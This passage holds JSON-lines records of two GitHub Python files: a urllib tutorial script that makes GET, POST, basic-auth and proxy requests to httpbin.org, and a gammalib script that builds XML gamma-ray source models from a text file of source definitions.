+{"seq_id":"43939741965","text":"import urllib.request\nimport urllib.parse\nimport json\n\n# takes a URL string as the argument\nr = urllib.request.urlopen('http://httpbin.org/get')\n# read the content of the response\ntext = r.read()\nprint(text)\nprint('*' * 50)\n# HTTP status code and reason message\nprint(r.status, r.reason)\nprint('*' * 50)\nr.close()\n# the returned content is in JSON format, so load it directly with the loads function\nobj = json.loads(text)\nprint(obj)\nprint('*' * 50)\n\n# r.headers is an HTTPMessage object\nprint(r.headers)\nprint('*' * 50)\n\nfor k, v in r.headers._headers:\n    print('%s: %s' % (k, v))\nprint('*' * 50)\n\nua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ' \\\n     'Chrome/89.0.4389.90 Safari/537.36 '\n# add custom header information\nreq = urllib.request.Request('http://httpbin.org/user-agent')\nreq.add_header('User-agent', ua)\n# takes a urllib.request.Request object as the argument\nr = urllib.request.urlopen(req)\nresp = json.load(r)\nprint(\"user-agent:\", resp[\"user-agent\"])\nprint('*' * 50)\n\nauth_handler = urllib.request.HTTPBasicAuthHandler()\nauth_handler.add_password(realm='httpbin.org',\n                          uri='basic-auth/hello/123456',\n                          user='hello',\n                          passwd='123456')\nopener = urllib.request.build_opener(auth_handler)\nurllib.request.install_opener(opener)\nr = urllib.request.urlopen('http://httpbin.org')\nprint(r.read().decode('utf-8'))\nprint('*' * 50)\n\n# pass parameters using the GET method\nparams = urllib.parse.urlencode({'spam': 1, 'eggs': 2, 'bacon': 2})\nurl = 'http://httpbin.org/get?%s' % params\nwith urllib.request.urlopen(url) as f:\n    print(json.load(f))\nprint('*' * 50)\n\n# pass parameters using the POST method\ndata = urllib.parse.urlencode({'name': 'hello_world', 'age': 18})\ndata = data.encode()\nwith urllib.request.urlopen('http://httpbin.org/post', data) as f:\n    print(json.load(f))\nprint('*' * 50)\n\n# request a remote url through a proxy IP\nproxy_handler = urllib.request.ProxyHandler({'http': 'http://172.0.0.1:9000'})\nopener = urllib.request.build_opener(proxy_handler)\nr = opener.open('http://httpbin.org/ip')\nprint('11111111', r.read())\n","repo_name":"showyouhappiness/Python_study","sub_path":"爬虫/urllib_sample.py","file_name":"urllib_sample.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"24520478764","text":"#! 
/usr/bin/env python\nimport gammalib\nimport sys\n\n# =========================================== #\n# Create a model container filled with models #\n# =========================================== #\n\ndef numdiv(num):\n\t#divide number into number and power \n\tnumlist =(\"%.5e\" %num).split('e')\n\tnumlist[1]=\"1e\"+numlist[1]\n\treturn numlist\n\ndef EnConv(energy, unit):\n\t# divide energy \n\t# 50.0*GeV ---> 50000.0 , if in MeV\n\tlistEnergy = [0.0,0.0]\n\t\n\tif (unit == \"MeV\"):\n\t\tlistEnergy[0] = gammalib.GEnergy(float(energy.split('*')[0]),energy.split('*')[1]).MeV()\n\t\tlistEnergy[1] = \"1.0\" \n\telif (unit == \"GeV\"):\n\t\tlistEnergy[0] = gammalib.GEnergy(float(energy.split('*')[0]),energy.split('*')[1]).GeV()\n\t\tlistEnergy[1] = \"1e3\" \n\telif (unit == \"TeV\"):\n\t\tlistEnergy[0] = gammalib.GEnergy(float(energy.split('*')[0]),energy.split('*')[1]).TeV()\n\t\tlistEnergy[1] = \"1e6\" \n\telse:\n\t\tprint(\"Wrong Energy conversion! CHECK value \"+energy) \n \n\treturn listEnergy\n\n\ndef sourceDef(info):\n\t# --------------------\n\t# CREATE SOURCE BRANCH\n\t# --------------------\n\t# spectral and spatial components will be appended to this branch\n\t# 1 branch for each source in the XML model\n\n\tsrcname = info[0]\n\tmodelname = info[1] #extract model name for SOURCE\n\tts = info[2]\n\t#if ver != '': print('--------------------------------')\n\n\t\n\tpointList = ['Point']\n\textendedList = ['RadDisk','RadGauss','RadShell', 'EllDisk', 'EllGauss']\n\tdiffuseList = ['DiffIso','DiffMap','DiffMapCube']\n\tbkg_radial = ['BkgGauss', 'Profile', 'Polynom']\n\tbkg_irf = ['CTAIrf'] \n\tbkg_cube = ['CTACube']\n\n\tif (modelname in pointList):\n\t\tsource_txt = 'source type=\"PointSource\" name=\"'+str(srcname)+'\"'\n\telif (modelname in extendedList):\n\t\tsource_txt = 'source type=\"ExtendedSource\" name=\"'+str(srcname)+'\"'\n\telif (modelname in diffuseList):\n\t\tsource_txt = 'source type=\"DiffuseSource\" name=\"'+str(srcname)+'\"'\n\telif (modelname in bkg_radial):\n\t\tsource_txt = 'source name=\"Background\" type=\"RadialAcceptance\" instrument=\"CTA\"'\n\telif (modelname in bkg_irf):\n\t\tsource_txt = 'source name=\"Background\" type=\"CTAIrfBackground\" instrument=\"CTA\"'\n\telif (modelname in bkg_cube):\n\t\tsource_txt = 'source name=\"Background\" type=\"CTACubeBackground\" instrument=\"CTA\"'\n\telse: \n\t\tprint(\"Mispelled spatial model, open the .txt and check it!\")\n\t\tsys.exit() \n\n\tif (ts == \"1\"):\n\t\tsource_txt = source_txt + ' tscalc=\"1\"'\n\n\tsource_branch = gammalib.GXmlElement(source_txt) \n\tif (srcname[0:2] == \"BKG\"):\n\t\tif ver != '': print(\"-----------background-----------\")\n\t\tif ver != '': print('The source ' + srcname + ' is a ' + modelname) \n\n\t\t#create SPECTRAL model\n\t\tspectral = specFun(info[8:]) #string \n\t\tsource_branch.append(spectral) \n\telse: \n\t\tif ver != '': print(\"------source: \" + srcname + \"-------\")\n\t\tif ver != '': print('The source ' + srcname + ' is a ' + modelname) \n\n\t\t#create SPECTRAL model\n\t\tspectral = specFun(info[8:]) #string \n\t\tsource_branch.append(spectral) \n\n\t\tif (modelname != 'CTAIrf' and modelname != 'CTACube'):\n\t\t\t#create SPATIAL model \n\t\t\tspatial = spatFun(info[1:])\n\t\t\tsource_branch.append(spatial)\n\n\t\t#check if the last item is a file fits for the TEMPORAL evolution \n\t\tif (info[-1][-4:] == 'fits'):\n\t\t\t#create TEMPORAL model (use last two item in list, NORMALIZATION and FITS file)\n\t\t\ttemporal = 
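The mantissa/exponent split that `numdiv` performs, and the unit factors that `EnConv` returns, can be checked without gammalib. A standalone sketch that mimics both (the ×1e3/×1e6 factors mirror the GeV/TeV branches above; `en_conv` here is an illustrative stand-in for `EnConv`, not gammalib's API):

def numdiv(num):
    # split a float into mantissa and power-of-ten strings, e.g. 3.5e-16 -> ['3.50000', '1e-16']
    mantissa, exponent = ("%.5e" % num).split('e')
    return [mantissa, "1e" + exponent]

def en_conv(energy, unit):
    # '50.0*GeV' -> [value expressed in `unit`, scale factor of that unit relative to MeV]
    value, in_unit = energy.split('*')
    to_mev = {'MeV': 1.0, 'GeV': 1e3, 'TeV': 1e6}
    scale = {'MeV': '1.0', 'GeV': '1e3', 'TeV': '1e6'}
    mev = float(value) * to_mev[in_unit]
    return [mev / to_mev[unit], scale[unit]]

print(numdiv(3.5e-16))             # ['3.50000', '1e-16']
print(en_conv('50.0*GeV', 'MeV'))  # [50000.0, '1.0']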
temporalFun(info[-2:])\n\t\t\tsource_branch.append(temporal)\n\n\tif (ts == \"1\"):\n\t\tif ver != '': print(\"TS calculation: yes\")\n\t\t#source_txt=source_txt+' tscalc=\"1\"'\n\telse:\n\t\tif ver != '': print(\"TS calculation: no\")\n\n\treturn source_branch\n\ndef spatFun(inSpat):\n\t# --------------------\n\t# CREATE SPATIAL MODEL\n\t# --------------------\n\n\t#get model name\n\tSpatModel = inSpat[0] \n\n\t# set RA and DEC, common for all the spatial models\n\tra = inSpat[2]\n\tdec = inSpat[3]\n\n\t# set text to be put in the xml file\n\tra_text='parameter scale=\"1.0\" name=\"RA\" min=\"-360\" max=\"360\" free=\"0\" value=\"'+ra+'\"'\n\tdec_text='parameter scale=\"1.0\" name=\"DEC\" min=\"-90\" max=\"90\" free=\"0\" value=\"'+dec+'\"'\n\n\tif (SpatModel == 'Point'):\n\t\tspatial = gammalib.GXmlElement('spatialModel type=\"SkyDirFunction\"') #compatibility with Fermi/LAT\n\t\tspatial.append(ra_text)\n\t\tspatial.append(dec_text)\n\n\telif (SpatModel == 'RadDisk'):\n\t\tspatial = gammalib.GXmlElement('spatialModel type=\"DiskFunction\"')\n\t\tspatial.append(ra_text)\n\t\tspatial.append(dec_text)\n\t\tradius = inSpat[4]\n\t\tradius_text = 'parameter name=\"Radius\" scale=\"1.0\" min=\"0.01\" max=\"10\" free=\"0\" value=\"' + radius +'\"'\n\t\tspatial.append(radius_text)\n\n\telif (SpatModel == 'RadGauss'):\n\t\tspatial = gammalib.GXmlElement('spatialModel type=\"GaussFunction\"')\n\t\tspatial.append(ra_text)\n\t\tspatial.append(dec_text)\n\t\tsig = inSpat[4]\n\t\tsig_text = 'parameter name=\"Sigma\" scale=\"1.0\" min=\"0.01\" max=\"10\" free=\"0\" value=\"' + sig +'\"'\n\t\tspatial.append(sig_text)\n\n\telif (SpatModel == 'RadShell'):\n\t\tspatial = gammalib.GXmlElement('spatialModel type=\"ShellFunction\"')\n\t\tspatial.append(ra_text)\n\t\tspatial.append(dec_text)\n\t\tradius = inSpat[4]\n\t\twidth = inSpat[5]\n\t\tradius_text = 'parameter name=\"Radius\" scale=\"1.0\" min=\"0.01\" max=\"10\" free=\"0\" value=\"' + radius +'\"'\n\t\twidth_text = 'parameter name=\"Width\" scale=\"1.0\" min=\"0.01\" max=\"10\" free=\"0\" value=\"' + width + '\"'\n\t\tspatial.append(radius_text)\n\t\tspatial.append(width_text)\n\n\telif (SpatModel == 'EllDisk'):\n\t\tspatial = gammalib.GXmlElement('spatialModel type=\"EllipticalDisk\"')\n\t\tspatial.append(ra_text)\n\t\tspatial.append(dec_text)\n\t\tPA = inSpat[4]\n\t\tminr = inSpat[5]\n\t\tmaxr = inSpat[6]\n\t\tPA_text = 'parameter name=\"PA\" scale=\"1.0\" min=\"-360\" max=\"360\" free=\"0\" value=\"' + PA +'\"'\n\t\tminr_text = 'parameter name=\"MinorRadius\" scale=\"1.0\" min=\"0.001\" max=\"10\" free=\"0\" value=\"' + minr + '\"'\n\t\tmaxr_text = 'parameter name=\"MajorRadius\" scale=\"1.0\" min=\"0.001\" max=\"10\" free=\"0\" value=\"' + maxr + '\"'\n\t\tspatial.append(PA_text)\n\t\tspatial.append(minr_text)\n\t\tspatial.append(maxr_text)\n\n\telif (SpatModel == 'EllGauss'):\n\t\tspatial = gammalib.GXmlElement('spatialModel type=\"EllipticalGauss\"')\n\t\tspatial.append(ra_text)\n\t\tspatial.append(dec_text)\n\t\tPA = inSpat[4]\n\t\tminr = inSpat[5]\n\t\tmaxr = inSpat[6]\n\t\tPA_text = 'parameter name=\"PA\" scale=\"1.0\" min=\"-360\" max=\"360\" free=\"0\" value=\"' + PA +'\"'\n\t\tminr_text = 'parameter name=\"MinorRadius\" scale=\"1.0\" min=\"0.001\" max=\"10\" free=\"0\" value=\"' + minr + '\"'\n\t\tmaxr_text = 'parameter name=\"MajorRadius\" scale=\"1.0\" min=\"0.001\" max=\"10\" free=\"0\" value=\"' + maxr + '\"'\n\t\tspatial.append(PA_text)\n\t\tspatial.append(minr_text)\n\t\tspatial.append(maxr_text)\n\n\telif (SpatModel == 
'DiffIso'):\n\t\tspatial = gammalib.GXmlElement('spatialModel type=\"DiffuseSource\"')\n\t\tvalue = inSpat[4]\n\t\tvalue_text = 'parameter name=\"Value\" scale=\"1\" min=\"1\" max=\"1\" free=\"0\" value=\"' + value +'\"' \n\t\tspatial.append(value_text)\n\n\telif (SpatModel == 'DiffMap'):\n\t\tspatial = gammalib.GXmlElement('spatialModel type=\"DiffuseSource\" file=\"map.fits\"')\n\t\tvalue = inSpat[4]\n\t\tvalue_text = 'parameter name=\"Prefactor\" scale=\"1\" min=\"0.001\" max=\"1000.0\" free=\"0\" value=\"' + value +'\"'\n\t\tspatial.append(value_text)\n\n\telif (SpatModel == 'DiffMapCube'):\n\t\tspatial = gammalib.GXmlElement('spatialModel type=\"MapCubeFunction\" file=\"map_cube.fits\"')\n\t\tvalue = inSpat[4]\n\t\tvalue_text = 'parameter name=\"Normalization\" scale=\"1\" min=\"0.001\" max=\"1000.0\" free=\"0\" value=\"' + value +'\"'\n\t\tspatial.append(value_text) \n\n\n\t\t#---------- Here starts background spatial models\n\n\telif (SpatModel == 'BkgGauss'):\n\t\tspatial = gammalib.GXmlElement('radialModel type=\"Gaussian\"')\n\t\tsig = inSpat[2]\n\t\tsig_text = 'parameter name=\"Sigma\" scale=\"1.0\" min=\"0.01\" max=\"10.0\" free=\"0\" value=\"' + sig +'\"'\n\t\tspatial.append(sig_text)\n\t\t\t \n\telif (SpatModel == 'Profile'):\n\t\tspatial = gammalib.GXmlElement('radialModel type=\"Profile\"')\n\t\twidth = inSpat[2]\n\t\tcore = inSpat[3]\n\t\ttail = inSpat[4]\n\t\twidth_text = 'parameter name=\"Width\" scale=\"1.0\" min=\"0.01\" max=\"10000.0\" free=\"0\" value=\"' + width +'\"'\n\t\tcore_text = 'parameter name=\"Core\" scale=\"1.0\" min=\"0.01\" max=\"10000.0\" free=\"0\" value=\"' + core +'\"'\n\t\ttail_text = 'parameter name=\"Tail\" scale=\"1.0\" min=\"0.01\" max=\"10000.0\" free=\"0\" value=\"' + tail +'\"'\n\n\t\tspatial.append(width_text)\n\t\tspatial.append(core_text)\n\t\tspatial.append(tail_text)\n\n\telif (SpatModel == 'Polynom'):\n\t\tspatial = gammalib.GXmlElement('radialModel type=\"Polynom\"')\n\t\tcoef = inSpat[2]\n\t\tcoef = coef.split(\"_\")\n\t\tfor i in range(0,len(coef)):\n\t\t\tname_coef = 'Coeff' + str(i)\n\t\t\tcoef_text = 'parameter name=\"' + name_coef +'\" scale=\"1.0\" value=\"'+coef[i]+'\" min=\"-10.0\" max=\"10.0\" free=\"0\"'\n\t\t\tspatial.append(coef_text)\n\t\n\telse:\n\t\tprint(\"Wrong input model\")\n\t\tsys.exit()\n\treturn spatial\n\ndef specFun(inSpec):\n\t# --------------------\n\t# CREATE SPECTRAL MODEL\n\t# --------------------\n\t# CHOOSE BETWEEN = \"PowerLaw2\", \"PowerLaw\", \"NodeFunction\", \"LogParabola\", \"Gaussian\", \"FileFunction\", \"ExpCutoff\", \"ConstantValue\", \"BrokenPowerLaw\"\n\n\t#set spectral model name\n\tSpecModel = inSpec[0]\n\t\n\tif (SpecModel == 'CONST'):\n\t\t#CONSTANT MODEL\n\t\tif ver != '': print('Spectral model: ' + SpecModel)\n\t\tnorm = float(inSpec[1]) \n\t\tnorm_text='parameter scale=\"'+numdiv(norm)[1]+'\" name=\"Normalization\" min=\"1e-7\" max=\"1000\" free=\"1\" value=\"'+numdiv(norm)[0]+'\"'\n\t\tspectral = gammalib.GXmlElement('spectrum type=\"ConstantValue\"') \n\t\tspectral.append(norm_text)\n\n\telif (SpecModel == 'FUNC'):\n\t\t# FILE FUNCTION\n\t\tif ver != '': print('Spectral model: ' + SpecModel)\n\t\tnorm = float(inSpec[1])\n\t\tfilepath = inSpec[2]\n\t\tnorm_text='parameter scale=\"'+numdiv(norm)[1]+'\" name=\"Normalization\" min=\"1e-7\" max=\"1000\" free=\"1\" value=\"'+numdiv(norm)[0]+'\"'\n\t\tspectral = gammalib.GXmlElement('spectrum type=\"FileFunction\" file=\"'+filepath+'\"') \n\t\tspectral.append(norm_text)\n\t\n\telif (SpecModel == 'NODE'):\n\t\tif ver != '': 
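Every spatial branch above follows the same pattern: one `spatialModel` element plus `parameter` children serialized from attribute strings. A gammalib-free sketch of the same structure using the standard library (element and attribute names copied from the strings above; the RA/DEC values are illustrative):

import xml.etree.ElementTree as ET

def parameter(name, value, scale="1.0", vmin=None, vmax=None, free="0"):
    # build one <parameter .../> element with the attribute set used above
    attrs = {"name": name, "value": str(value), "scale": scale, "free": free}
    if vmin is not None:
        attrs["min"] = str(vmin)
    if vmax is not None:
        attrs["max"] = str(vmax)
    return ET.Element("parameter", attrs)

spatial = ET.Element("spatialModel", {"type": "SkyDirFunction"})
spatial.append(parameter("RA", 83.63, vmin=-360, vmax=360))
spatial.append(parameter("DEC", 22.01, vmin=-90, vmax=90))
print(ET.tostring(spatial).decode())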
print(SpecModel)\n\t\tn_param = int(inSpec[1]) #number of parameters\n\n\t\tif n_param % 2 != 0:\n\t\t\tif ver != '': print(\"Wrong number of parameters in NODE SPECTRAL MODEL\")\n\t\t\tsys.exit() \n\n\t\tspectral = gammalib.GXmlElement('spectrum type=\"NodeFunction\"')\n\n\t\tvalues = []\n\t\tfor n in range(2, n_param + 2, 2):\n\t\t\tif ver != '': print(inSpec[n])\n\t\t\tif ver != '': print(type(inSpec[n]))\n\t\t\tvalues.append(EnConv(inSpec[n], \"MeV\")) #energy\n\t\t\tvalues.append(inSpec[n+1])\t\t\t\t#intensity\n\n\t\tval_x = values[0::2] #select only even characters\n\t\tval_y = values[1::2] #select only odd characters\n\t\tif ver != '': print(val_x)\n\t\tpoints = [(val_x[i],val_y[i]) for i in range(0, len(val_x))] #making list of points\n\t\tpointss = sorted(points, key=lambda k: k[1]) #sort points by energy\n\t\tif ver != '': print(pointss)\n\t\tfor n in range(0, len(pointss)):\t\n\t\t\tenergy_text = 'parameter scale=\"'+str(pointss[n][0][1])+'\" name=\"Energy\" min=\"0.1\" max=\"1.0e20\" free=\"0\" value=\"'+str(pointss[n][0][0])+'\"'\n\t\t\tintens_text = 'parameter scale=\"1e-07\" name=\"Intensity\" min=\"1e-07\" max=\"1000.0\" free=\"1\" value=\"'+pointss[n][1]+'\"'\n\t\t\tnode = spectral.append('node')\n\t\t\tnode.append(energy_text)\n\t\t\tnode.append(intens_text)\n\n\telif (SpecModel == 'PL'):\n\t\t#POWER LAW MODEL\n\t\tif ver != '': print('Spectral model: '+SpecModel)\n\t\tpref = float(inSpec[1])\n\t\tindex = inSpec[2]\n\t\tPivotEnergy = EnConv(inSpec[3], \"MeV\") #convert the energy in MeV\n\n\t\tpref_text='parameter scale=\"'+numdiv(pref)[1]+'\" name=\"Prefactor\" min=\"1e-7\" max=\"1000\" free=\"1\" value=\"'+numdiv(pref)[0]+'\"'\n\t\tindex_text='parameter scale=\"-1.0\" name=\"Index\" min=\"0.0\" max=\"+10.0\" free=\"1\" value=\"'+index+'\"'\n\t\tenergy_text='parameter scale=\"'+str(PivotEnergy[1])+'\" name=\"Scale\" min=\"0.0\" max=\"+10000000.0\" free=\"0\" value=\"'+str(PivotEnergy[0])+'\"'\n\n\t\tspectral = gammalib.GXmlElement('spectrum type=\"PowerLaw\"')\n\t\tspectral.append(pref_text)\n\t\tspectral.append(index_text)\n\t\tspectral.append(energy_text)\n\n\telif (SpecModel == 'PL2'):\n\t\t#POWER LAW 2 MODEL\n\t\tif ver != '': print('Spectral model: '+SpecModel)\n\t\tpref = float(inSpec[1])\n\t\tindex = inSpec[2]\n\t\tMinEnergy = EnConv(inSpec[3], \"MeV\") #convert the energy in MeV\n\t\tMaxEnergy = EnConv(inSpec[4], \"MeV\") #convert the energy in MeV\n\t\tif ver != '': print(MaxEnergy)\n\n\t\tpref_text='parameter scale=\"'+numdiv(pref)[1]+'\" name=\"Integral\" min=\"1e-7\" max=\"1000\" free=\"1\" value=\"'+numdiv(pref)[0]+'\"'\n\t\tindex_text='parameter scale=\"-1.0\" name=\"Index\" min=\"0.0\" max=\"+10.0\" free=\"1\" value=\"'+index+'\"'\n\t\tmin_energy_text='parameter scale=\"'+str(MinEnergy[1])+'\" name=\"LowerLimit\" min=\"10.0\" max=\"+100000000.0\" free=\"0\" value=\"'+str(MinEnergy[0])+'\"'\n\t\tmax_energy_text='parameter scale=\"'+str(MaxEnergy[1])+'\" name=\"UpperLimit\" min=\"10.0\" max=\"+100000000.0\" free=\"0\" value=\"'+str(MaxEnergy[0])+'\"'\n\n\t\tspectral = gammalib.GXmlElement('spectrum type=\"PowerLaw2\"')\n\t\tspectral.append(pref_text)\n\t\tspectral.append(index_text)\n\t\tspectral.append(min_energy_text)\n\t\tspectral.append(max_energy_text)\n\n\telif (SpecModel == 'BRPL'):\n\t\t# BrokenPowerLaw MODEL\n\t\tif ver != '': print('Spectral model: ' + SpecModel)\n\t\tpref = float(inSpec[1])\n\t\tindex1 = inSpec[2] #must be negative\n\t\tCutEnergy = EnConv(inSpec[3],\"GeV\") #convert the energy in GeV\n\t\tindex2 = inSpec[4] # must be 
negative\n\n\t\tpref_text='parameter scale=\"'+numdiv(pref)[1]+'\" name=\"Prefactor\" min=\"1e-7\" max=\"1000\" free=\"1\" value=\"'+numdiv(pref)[0]+'\"'\n\t\tindex1_text='parameter scale=\"-1.0\" name=\"Index1\" min=\"0.01\" max=\"+10.0\" free=\"1\" value=\"'+index1+'\"'\n\t\tcut_energy_text='parameter scale=\"'+str(CutEnergy[1])+'\" name=\"BreakValue\" min=\"10.0\" max=\"+100000000.0\" free=\"1\" value=\"'+str(CutEnergy[0])+'\"'\n\t\tindex2_text='parameter scale=\"-1.0\" name=\"Index2\" min=\"0.01\" max=\"+10.0\" free=\"1\" value=\"'+index2+'\"'\n\n\t\tspectral = gammalib.GXmlElement('spectrum type=\"BrokenPowerLaw\"')\n\t\tspectral.append(pref_text)\n\t\tspectral.append(index1_text)\n\t\tspectral.append(cut_energy_text)\n\t\tspectral.append(index2_text)\n\n\telif (SpecModel == 'EXPL'):\n\t\t#Exponential CUT OFF POWER LAW MODEL\n\t\tif ver != '': print('Spectral model: ' + SpecModel)\n\t\tpref = float(inSpec[1])\n\t\tindex = inSpec[2]\n\t\tPivotEnergy = EnConv(inSpec[3], \"MeV\") #convert the energy in MeV\n\t\tCutEnergy = EnConv(inSpec[4], \"MeV\") #convert the energy in MeV\n\t\t\n\t\tpref_text='parameter scale=\"'+numdiv(pref)[1]+'\" name=\"Prefactor\" min=\"1e-7\" max=\"1000\" free=\"1\" value=\"'+numdiv(pref)[0]+'\"'\n\t\tindex_text='parameter scale=\"-1.0\" name=\"Index\" min=\"0.0\" max=\"+10.0\" free=\"1\" value=\"'+index+'\"'\n\t\tcut_energy_text='parameter scale=\"1.0\" name=\"Cutoff\" min=\"0.01\" max=\"100000000.0\" free=\"1\" value=\"'+str(CutEnergy[0])+'\"'\n\t\tpiv_energy_text='parameter scale=\"1.0\" name=\"Scale\" min=\"0.01\" max=\"100000000.0\" free=\"0\" value=\"'+str(PivotEnergy[0])+'\"'\n\n\t\tspectral = gammalib.GXmlElement('spectrum type=\"ExpCutoff\"')\n\t\tspectral.append(pref_text)\n\t\tspectral.append(index_text)\n\t\tspectral.append(cut_energy_text)\n\t\tspectral.append(piv_energy_text)\n\n\telif (SpecModel == 'SEPL'):\n\t\t#SUPER EXPONENTIALY CUY-OFF POWER LAW\n\t\tif ver != '': print('Spectral model: ' + SpecModel)\n\t\tpref = float(inSpec[1])\n\t\tindex1 = inSpec[2]\n\t\tindex2 = inSpec[3]\n\t\tPivotEnergy = EnConv(inSpec[4], \"MeV\") #convert the energy in MeV \n\t\tCutEnergy = EnConv(inSpec[5], \"MeV\") #convert the energy in MeV \n\n\t\tpref_text='parameter scale=\"'+numdiv(pref)[1]+'\" name=\"Prefactor\" min=\"1e-7\" max=\"1000\" free=\"1\" value=\"'+numdiv(pref)[0]+'\"'\n\t\tindex1_text='parameter scale=\"-1.0\" name=\"Index1\" min=\"0.0\" max=\"+10.0\" free=\"1\" value=\"'+index1+'\"'\n\t\tindex2_text='parameter scale=\"1.0\" name=\"Index2\" min=\"0.1\" max=\"10.0\" free=\"1\" value=\"'+index2+'\"'\n\t\tcut_energy_text='parameter scale=\"'+str(CutEnergy[1])+'\" name=\"Cutoff\" min=\"0.01\" max=\"100000000.0\" free=\"1\" value=\"'+str(CutEnergy[0])+'\"'\n\t\tpiv_energy_text='parameter scale=\"'+str(PivotEnergy[1])+'\" name=\"Scale\" min=\"0.01\" max=\"100000000.0\" free=\"0\" value=\"'+str(PivotEnergy[0])+'\"'\n\n\n\t\tspectral = gammalib.GXmlElement('spectrum type=\"PLSuperExpCutoff\"')\n\t\tspectral.append(pref_text)\n\t\tspectral.append(index1_text)\n\t\tspectral.append(index2_text)\n\t\tspectral.append(cut_energy_text)\n\t\tspectral.append(piv_energy_text)\n\n\telif (SpecModel == 'LOGPAR'):\n\t\tif ver != '': print('Spectral model: ' + SpecModel)\n\t\t#LOG PARABOLA\n\t\tpref = float(inSpec[1])\n\t\tindex = inSpec[2]\n\t\tcurv = inSpec[3]\n\t\tE_scale = EnConv(inSpec[4], \"MeV\") #convert the energy in MeV\n\n\t\tpref_text='parameter scale=\"'+numdiv(pref)[1]+'\" name=\"Prefactor\" min=\"1e-7\" max=\"1000\" free=\"1\" 
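What the `PowerLaw` and `ExpCutoff` parameter sets encode can be evaluated directly: in the usual ctools/gammalib convention the differential flux is dN/dE = k0·(E/E0)^-Γ, optionally multiplied by exp(-E/Ecut). The prefactor and energies below are illustrative, not taken from any real source:

import numpy as np

def power_law(E, k0, gamma, E0):
    # differential flux dN/dE, in the same units as k0
    return k0 * (E / E0) ** (-gamma)

def exp_cutoff_pl(E, k0, gamma, E0, Ecut):
    return power_law(E, k0, gamma, E0) * np.exp(-E / Ecut)

E = np.logspace(5, 8, 4)  # 0.1 GeV .. 100 GeV, expressed in MeV
print(power_law(E, k0=5.7e-16, gamma=2.48, E0=3e5))
print(exp_cutoff_pl(E, k0=5.7e-16, gamma=2.48, E0=3e5, Ecut=1e7))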
value=\"'+numdiv(pref)[0]+'\"'\n\t\tindex_text='parameter scale=\"-1.0\" name=\"Index\" min=\"0.0\" max=\"+10.0\" free=\"1\" value=\"'+index+'\"'\n\t\tcurv_text='parameter scale=\"-1.0\" name=\"Curvature\" min=\"-5.0\" max=\"+5.0\" free=\"1\" value=\"'+ curv +'\"'\n\t\tE_scale_text='parameter scale=\"1.0\" name=\"Scale\" min=\"0.01\" max=\"100000000.0\" free=\"0\" value=\"'+str(E_scale[0])+'\"'\n\t\t\n\t\tspectral = gammalib.GXmlElement('spectrum type=\"LogParabola\"')\n\n\t\tspectral.append(pref_text)\n\t\tspectral.append(index_text)\n\t\tspectral.append(curv_text)\n\t\tspectral.append(E_scale_text)\n\n\telif (SpecModel == 'GAUSS'):\n\t\tif ver != '': print('Spectral model: ' + SpecModel)\n\t\t#GAUSSIAN FUNCTION\n\t\tnorm = float(inSpec[1])\n\t\tmean = EnConv(inSpec[2],\"GeV\")\n\t\tsigma = inSpec[3]\n\n\t\tnorm_text = 'parameter scale=\"'+numdiv(norm)[1]+'\" name=\"Normalization\" min=\"1e-7\" max=\"1000.0\" free=\"1\" value=\"'+numdiv(norm)[0]+'\"'\n\t\tmean_text = 'parameter scale=\"1e6\" name=\"Mean\" value=\"'+str(mean[0])+'\"'\n\t\tsigma_text = 'parameter scale=\"1e6\" name=\"Sigma\" min=\"0.01\" max=\"100.0\" free=\"1\" value=\"'+sigma+'\"'\n\n\t\tspectral = gammalib.GXmlElement('spectrum type=\"Gaussian\"')\n\t\tspectral.append(norm_text)\n\t\tspectral.append(mean_text)\n\t\tspectral.append(sigma_text)\n\n\telse:\n\t print(\"Wrong Spectral model!!! CHECK MODEL NAME!!!\")\n\t sys.exit()\n\n\treturn spectral\n\t \ndef temporalFun(inTime):\n\t# --------------------\n\t# CREATE TEMPORAL MODEL\n\t# --------------------\n\n\t#get model name (TDB)\n\t#SpatModel = inTime[0] \n\tSpatModel = \"Light\"\n\t\n\tnorm = float(inTime[0])\n\tfitspath = inTime[1]\n\n\t# set text to be put in the xml file\n\n\tnorm_text ='parameter scale=\"'+numdiv(norm)[1]+'\" name=\"Normalization\" min=\"0.0\" max=\"1000.0\" free=\"0\" value=\"'+numdiv(norm)[0]+'\"'\n\n\tif (SpatModel == 'Light'):\n\t\ttemporal = gammalib.GXmlElement('temporal type=\"LightCurve\" file=\"'+fitspath+'\"')\n\t\ttemporal.append(gammalib.GXmlElement(norm_text))\n\telse:\n\t\tprint(\"The only supported temporal model is the one with Normalization and a fits file\")\n\t\tsys.exit()\n\n\treturn temporal\n\n# ================= #\n# Show XML document #\n# ================= #\ndef show_xml(xml):\n\t\"\"\"\n\tShow XML document on the screen.\n\t\"\"\"\n\t# Allocate string URL\n\turl = gammalib.GUrlString()\n\t\n\t# Write XML document in URL\n\txml.write(url)\n\t\n\t# Print URL buffer\n\t#if ver != '': print(url.string())\n\t\n\t# Return\n\treturn\n\n# ======================== #\n# Main routine entry point #\n# ======================== #\nif __name__ == '__main__':\n\n\tnomefile = str(sys.argv[1])\n\t#f = open(nomefile, 'r') \n\n\t# Allocate XML document\n\txml = gammalib.GXml()\n\n\t# main branch \n\tsourcelibrary = xml.append('source_library title=\"source library\"')\n\n\t# if argv has verbose attribute, set verbose on\n\n\tglobal ver\n\n\tif len(sys.argv) == 3: \n\t\tver = 'yes'\n\telse: \n\t\tver = ''\n\n\n\n\n\t# read lines\n\n\twith open(nomefile) as openfile:\n\t\tfor line in openfile:\n\t\t\tinputs = line.split()\n\t\t\tif len(inputs) != 0:\n\t\t\t\tif line[0] != '#':\n\t\t\t\t\tsourcelibrary.append(sourceDef(inputs))\n\tif ver != '': print('--------------------------------')\n\t\n\t#SHOW XML FILE \n\tshow_xml(xml)\n\n\t#print(models)\n\t# Save the XML document into a file\n\tname_fil = 
